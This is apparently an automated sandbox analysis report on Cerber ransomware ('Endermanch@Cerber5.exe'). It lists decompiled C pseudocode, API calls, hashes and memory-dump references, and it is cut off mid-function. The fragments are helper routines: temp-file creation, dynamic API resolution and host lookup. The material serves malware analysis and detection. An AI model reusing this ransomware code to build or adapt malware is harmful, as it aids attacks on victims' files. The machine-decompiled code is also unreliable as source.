                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f54d61fc8af7bc45cf1c131fdf1c84b3a5d2e0742b843de307b586339b6c7b9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0121F9B290021167DB10BBB59D4E98F3BA8DF48318B54043BF905F71C2DE7CD94986AC
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00404D43(WCHAR* __edi) {
                                                                                                                                                                                        				short _v524;
                                                                                                                                                                                        				short _v1044;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                        				WCHAR* _t21;
                                                                                                                                                                                        				WCHAR* _t25;
                                                                                                                                                                                        				int _t26;
                                                                                                                                                                                        				WCHAR* _t27;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t25 = __edi;
                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                        				if(GetTempPathW(0x104,  &_v1044) != 0) {
                                                                                                                                                                                        					_t14 = GetTempFileNameW( &_v1044, E0040591C("W+x", 3, 0x9544c64e), 0,  &_v524);
                                                                                                                                                                                        					_t32 = _t14;
                                                                                                                                                                                        					if(_t14 != 0) {
                                                                                                                                                                                        						_t27 =  &_v524;
                                                                                                                                                                                        						E00404E5E(_t27, _t32);
                                                                                                                                                                                        						if(__edi != 0) {
                                                                                                                                                                                        							_t21 = _t28 + lstrlenW(_t27) * 2 - 0x208;
                                                                                                                                                                                        							while( *_t21 != 0x2e) {
                                                                                                                                                                                        								_t21 = _t21 - 2;
                                                                                                                                                                                        								__eflags = _t21;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							if( *_t25 != 0x2e) {
                                                                                                                                                                                        								_t21 =  &(_t21[1]);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							lstrcpyW(_t21, _t25);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t26 = E00405933(0,  &_v524);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t26;
                                                                                                                                                                                        			}













                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,?), ref: 00404D5B
                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00404D89
                                                                                                                                                                                          • Part of subcall function 00404E5E: SetFileAttributesW.KERNEL32(?,00000080,00000000,00404D9E), ref: 00404E67
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404DA5
                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00404DC8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FileTemp$AttributesNamePathlstrcpylstrlen
                                                                                                                                                                                        • String ID: W+x${f@
                                                                                                                                                                                        • API String ID: 1221998058-3981993173
                                                                                                                                                                                        • Opcode ID: a1ca47ba922a6c9e17a081fd3359b07ae7a59c4bfb4ff8d8a74f7b4a615e1f6d
                                                                                                                                                                                        • Instruction ID: 3d1850192e65b297c1812ba81e242392aa226734748325530c2f33dcaa0427c0
                                                                                                                                                                                        • Opcode Fuzzy Hash: a1ca47ba922a6c9e17a081fd3359b07ae7a59c4bfb4ff8d8a74f7b4a615e1f6d
                                                                                                                                                                                        • Instruction Fuzzy Hash: F70196F290022997CB70AB65DD09ED777ACEF80700F04017AB605F31D1EA78DE848AD8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E004099D8(void* __ecx, void* __edi, WCHAR* _a4) {
                                                                                                                                                                                        				short _v524;
                                                                                                                                                                                        				long _t12;
                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                        				long _t27;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                        				_t12 = ExpandEnvironmentStringsW(_a4,  &_v524, 0x104);
                                                                                                                                                                                        				if(_v524 != 0x25) {
                                                                                                                                                                                        					_t13 =  *0x42fac8; // 0xa
                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                        					_t27 =  *0x42fa64; // 0x5ed39d8
                                                                                                                                                                                        					_t12 = E004053CA(4 + _t13 * 4, _t22, _t27);
                                                                                                                                                                                        					 *0x42fa64 = _t12;
                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                        						CharLowerBuffW( &_v524, lstrlenW( &_v524));
                                                                                                                                                                                        						_t21 = E00405933(0,  &_v524);
                                                                                                                                                                                        						_t25 =  *0x42fac8; // 0xa
                                                                                                                                                                                        						 *0x42fac8 =  *0x42fac8 + 1;
                                                                                                                                                                                        						_t24 =  *0x42fa64; // 0x5ed39d8
                                                                                                                                                                                        						 *((intOrPtr*)(_t24 + _t25 * 4)) = _t21;
                                                                                                                                                                                        						return _t21;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t12;
                                                                                                                                                                                        			}












                                                                                                                                                                                        APIs
                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(0040A027,?,00000104), ref: 004099F0
                                                                                                                                                                                          • Part of subcall function 004053CA: GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2
                                                                                                                                                                                          • Part of subcall function 004053CA: SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457
                                                                                                                                                                                        • lstrlenW.KERNEL32(00000025), ref: 00409A29
                                                                                                                                                                                        • CharLowerBuffW.USER32(00000025,00000000), ref: 00409A37
                                                                                                                                                                                          • Part of subcall function 00405933: lstrlenW.KERNEL32(?,00000000,0040691D,?), ref: 0040593E
                                                                                                                                                                                          • Part of subcall function 00405933: memcpy.NTDLL(00000000,?,00000002,00000000,00000000,0040691D,?), ref: 0040595E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLastlstrlen$BuffCharEnvironmentExpandLowerStringsmemcpy
                                                                                                                                                                                        • String ID: %
                                                                                                                                                                                        • API String ID: 2407717054-2567322570
                                                                                                                                                                                        • Opcode ID: 46f0568ee778dbd4156db8c4d3dedf2d164526a81877d53e97c3f72a8b6ec04a
                                                                                                                                                                                        • Instruction ID: b68b054fab4078b33c7175d7f5feeef92c6c6c317c309be68269d8385537ad21
                                                                                                                                                                                        • Opcode Fuzzy Hash: 46f0568ee778dbd4156db8c4d3dedf2d164526a81877d53e97c3f72a8b6ec04a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E0162716002089BCB20DF64ED48D9B37BCEB44304F800176E559E35B5EB749A8ACF58
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                                        			E004049F6(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(0x10);
                                                                                                                                                                                        				_push(0x40d9d8);
                                                                                                                                                                                        				E0040B654(__ebx, __edi, __esi);
                                                                                                                                                                                        				_t25 = __ecx;
                                                                                                                                                                                        				 *((intOrPtr*)(_t26 - 0x1c)) = 0;
                                                                                                                                                                                        				 *(_t26 - 0x20) = GetLastError();
                                                                                                                                                                                        				 *(_t26 - 4) = 0;
                                                                                                                                                                                        				if(E004049E4(_t25) == 0) {
                                                                                                                                                                                        					 *0x40f1d8(_t25 + 8);
                                                                                                                                                                                        					 *_t25 = GetCurrentProcessId();
                                                                                                                                                                                        					 *((intOrPtr*)(_t25 + 4)) = 0;
                                                                                                                                                                                        					 *((intOrPtr*)(_t26 - 0x1c)) = 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
                                                                                                                                                                                        				SetLastError( *(_t26 - 0x20));
                                                                                                                                                                                        				return E0040B68F( *((intOrPtr*)(_t26 - 0x1c)));
                                                                                                                                                                                        			}






                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(0040D9D8,00000010,00405820,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A09
                                                                                                                                                                                          • Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4
                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(?), ref: 00404A24
                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?,0040678F), ref: 00404A2A
                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404A4C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CurrentErrorLastProcess$CriticalInitializeSection
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 666570305-0
                                                                                                                                                                                        • Opcode ID: 8d0a222941fdbcc95c59cec6384a4b78d50c2328e21d054b927e63f655ec6902
                                                                                                                                                                                        • Instruction ID: 6239d71e1b6d1d9b6d3a873080a6ec753aa0bdfafe20bcce74541f407a615959
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d0a222941fdbcc95c59cec6384a4b78d50c2328e21d054b927e63f655ec6902
                                                                                                                                                                                        • Instruction Fuzzy Hash: EDF01DB5C00205DBCB20EF65D90969EBBB0BF84310F10457BE551B36A0CB790945CF49
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                                        			E00404ABB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                        				_push(0x40d9f8);
                                                                                                                                                                                        				E0040B654(__ebx, __edi, __esi);
                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                        				 *(_t23 - 0x1c) = GetLastError();
                                                                                                                                                                                        				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
                                                                                                                                                                                        				_t11 = E004049E4(_t22);
                                                                                                                                                                                        				_t25 = _t11;
                                                                                                                                                                                        				if(_t11 != 0 || E004049F6(__ebx, _t22, __edi, _t22, _t25) != 0) {
                                                                                                                                                                                        					 *0x40f1dc(_t22 + 8);
                                                                                                                                                                                        					 *((intOrPtr*)(_t22 + 4)) = GetCurrentThreadId();
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *(_t23 - 4) =  *(_t23 - 4) | 0xffffffff;
                                                                                                                                                                                        				SetLastError( *(_t23 - 0x1c));
                                                                                                                                                                                        				return E0040B68F(_t14);
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(0040D9F8,0000000C,00405854,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A69
                                                                                                                                                                                          • Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4
                                                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00404A90
                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00404A96
                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404AAF
                                                                                                                                                                                          • Part of subcall function 004049F6: GetLastError.KERNEL32(0040D9D8,00000010,00405820,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A09
                                                                                                                                                                                          • Part of subcall function 004049F6: RtlInitializeCriticalSection.NTDLL(?), ref: 00404A24
                                                                                                                                                                                          • Part of subcall function 004049F6: GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?,0040678F), ref: 00404A2A
                                                                                                                                                                                          • Part of subcall function 004049F6: SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404A4C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$Current$CriticalProcessSection$EnterInitializeThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2985312556-0
                                                                                                                                                                                        • Opcode ID: 11db4a6207e87937c9456d00a85c428908f69b1342791137cee10eae4e53123c
                                                                                                                                                                                        • Instruction ID: ed2fb18bf2bb44b178cf3cceb23bf943281626dd3940bfcf2b284636644175bb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 11db4a6207e87937c9456d00a85c428908f69b1342791137cee10eae4e53123c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CF082B4940302DBCB20BBB1DD0965E7764AF44315F20897FA922B65E0CB3D4A46DF5D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                        			E00404AC0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                        				_push(0x40d9c8);
                                                                                                                                                                                        				E0040B654(__ebx, __edi, __esi);
                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                        				 *(_t22 - 0x1c) = GetLastError();
                                                                                                                                                                                        				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                                                                                                                                        				if(E004049E4(_t20) != 0) {
                                                                                                                                                                                        					if( *(_t20 + 4) == GetCurrentThreadId()) {
                                                                                                                                                                                        						 *(_t20 + 4) =  *(_t20 + 4) & 0x00000000;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t12 =  *0x40f1e4(_t20 + 8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
                                                                                                                                                                                        				SetLastError( *(_t22 - 0x1c));
                                                                                                                                                                                        				return E0040B68F(_t12);
                                                                                                                                                                                        			}






                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(0040D9C8,0000000C,004058FD,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404ACE
                                                                                                                                                                                          • Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4
                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00404AE6
                                                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00404AF9
                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404B0F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CurrentErrorLast$CriticalLeaveProcessSectionThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 736899326-0
                                                                                                                                                                                        • Opcode ID: c9943280ebc9ab71aa4115d391c0c0e18bb473fe2d3d34ce6aab4fdbcc10defd
                                                                                                                                                                                        • Instruction ID: 5d87240e8550010a82cb58736f3ebd64beaf0934954977050a7740b7a28618f7
                                                                                                                                                                                        • Opcode Fuzzy Hash: c9943280ebc9ab71aa4115d391c0c0e18bb473fe2d3d34ce6aab4fdbcc10defd
                                                                                                                                                                                        • Instruction Fuzzy Hash: B6F0A0B5C01601DBCB20BBA0DE0939E7770AF4131AF21817EE511B25D1CB7D5A09CA4D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00405693: lstrlen.KERNEL32(00000000,00405705,?,00000000), ref: 0040569B
                                                                                                                                                                                        • FindMimeFromData.URLMON(00000000,?,00000000,00000000,00000000,00000001,?,00000000), ref: 0040855A
                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000030), ref: 00408577
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DataFindFromMimelstrcmpilstrlen
                                                                                                                                                                                        • String ID: 2
                                                                                                                                                                                        • API String ID: 2072262229-450215437
                                                                                                                                                                                        • Opcode ID: 7a561d468afc9f80cb6f3808fbe95ba72a610e375edecba745370afe28735dc1
                                                                                                                                                                                        • Instruction ID: d05574d99582fdf8de803fc1e31f7f13cfa1da4baa173e70d20c9639e5a0a858
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a561d468afc9f80cb6f3808fbe95ba72a610e375edecba745370afe28735dc1
                                                                                                                                                                                        • Instruction Fuzzy Hash: FA7103B1D00209AFDF10DFA5C984AEEBBB9BF48304F01447AE945B7250DB3A9A45CF65
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                                        			E00405F6B(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                        				CHAR* _t4;
                                                                                                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                                                                                                        				signed int _t8;
                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                        				if(E00405EF5(__ecx) != 0) {
                                                                                                                                                                                        					_t4 = E00405905(0x40d370, 0x1e, 0x9f975aaf);
                                                                                                                                                                                        					_t7 = GetProcAddress(GetModuleHandleA(E00405905( &E0040D390, 0xc, 0x4f2d54ed)), _t4);
                                                                                                                                                                                        					if(_t7 != 0) {
                                                                                                                                                                                        						_t8 =  *_t7(_a4);
                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                        						_t10 =  ~( ~_t8);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t10;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00405EF5: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,0040833D), ref: 00405F3E
                                                                                                                                                                                          • Part of subcall function 00405EF5: GetProcAddress.KERNEL32(00000000), ref: 00405F45
                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00405FA8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, xrefs: 00405F6B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
                                                                                                                                                                                        • API String ID: 1646373207-2487945927
                                                                                                                                                                                        • Opcode ID: eb1521d442bcf14cb32f4a54366f8521662d93d7eb7da9abd42971e004c4292f
                                                                                                                                                                                        • Instruction ID: acd6d1d985faa0ad3600296bc9f406459d3a206cf20db9fabc00ae0cf49a83ab
                                                                                                                                                                                        • Opcode Fuzzy Hash: eb1521d442bcf14cb32f4a54366f8521662d93d7eb7da9abd42971e004c4292f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DE092B1A40621FADA3037B4AD06F0F2A588B04B40F020136B800F51C6EE7C88050ADE
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: gethostbynameinet_addr
                                                                                                                                                                                        • String ID: Cu@
                                                                                                                                                                                        • API String ID: 1594361348-2835949224
                                                                                                                                                                                        • Opcode ID: 62d59bb6ca14fe2f23ab534400652e2285e1f6d5320143334bdc0b8d198bd4a6
                                                                                                                                                                                        • Instruction ID: 4e8b9e47bf38c59bde1ecc2b7d999fb23bf2e5007af245ecbefbc72d7f427d54
                                                                                                                                                                                        • Opcode Fuzzy Hash: 62d59bb6ca14fe2f23ab534400652e2285e1f6d5320143334bdc0b8d198bd4a6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 72D01735600520EFCB10AB29EC48946BBB1EB493B0B0546B1FA69B73B0C334DC50EA84
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        • Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InformationLocalQuerySystem$AddressAllocFreeHandleModuleProc
                                                                                                                                                                                        • String ID: LocalAlloc$kernel32
                                                                                                                                                                                        • API String ID: 3225137318-3502785670
                                                                                                                                                                                        • Opcode ID: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
                                                                                                                                                                                        • Instruction ID: be8617b1cae468250e348172b45ec9404f85c9037005730047974938c5634671
                                                                                                                                                                                        • Opcode Fuzzy Hash: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C11BF72B18E4282EB84AF15A840629A2A1FBC8BE0F894031DE0D57764DF3DE845C314
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                                        			E00007FF77FF7CEF2214C(long long __rbx, long long __rcx, long long __rdx, long long __rsi, long long _a8, long long _a16, char _a24) {
                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                        				long long _v80;
                                                                                                                                                                                        				char _v88;
                                                                                                                                                                                        				long long _v96;
                                                                                                                                                                                        				char _v104;
                                                                                                                                                                                        				long long _v112;
                                                                                                                                                                                        				char _v120;
                                                                                                                                                                                        				long long _v136;
                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                        				intOrPtr _t37;
                                                                                                                                                                                        				long long _t44;
                                                                                                                                                                                        				long long _t50;
                                                                                                                                                                                        				long long _t53;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t53 = __rsi;
                                                                                                                                                                                        				_t50 = __rdx;
                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                        				_a16 = __rsi;
                                                                                                                                                                                        				r13d = r8d;
                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx)) != 1) goto 0xcef22181;
                                                                                                                                                                                        				goto 0xcef2218a;
                                                                                                                                                                                        				GetCurrentProcess();
                                                                                                                                                                                        				_v104 = __rdx;
                                                                                                                                                                                        				_v120 = __rbx;
                                                                                                                                                                                        				_v112 = __rcx;
                                                                                                                                                                                        				_v96 = 0xcef30618;
                                                                                                                                                                                        				if (r13d == 0) goto 0xcef221b8;
                                                                                                                                                                                        				_t10 = _t50 - 0xa; // 0x10
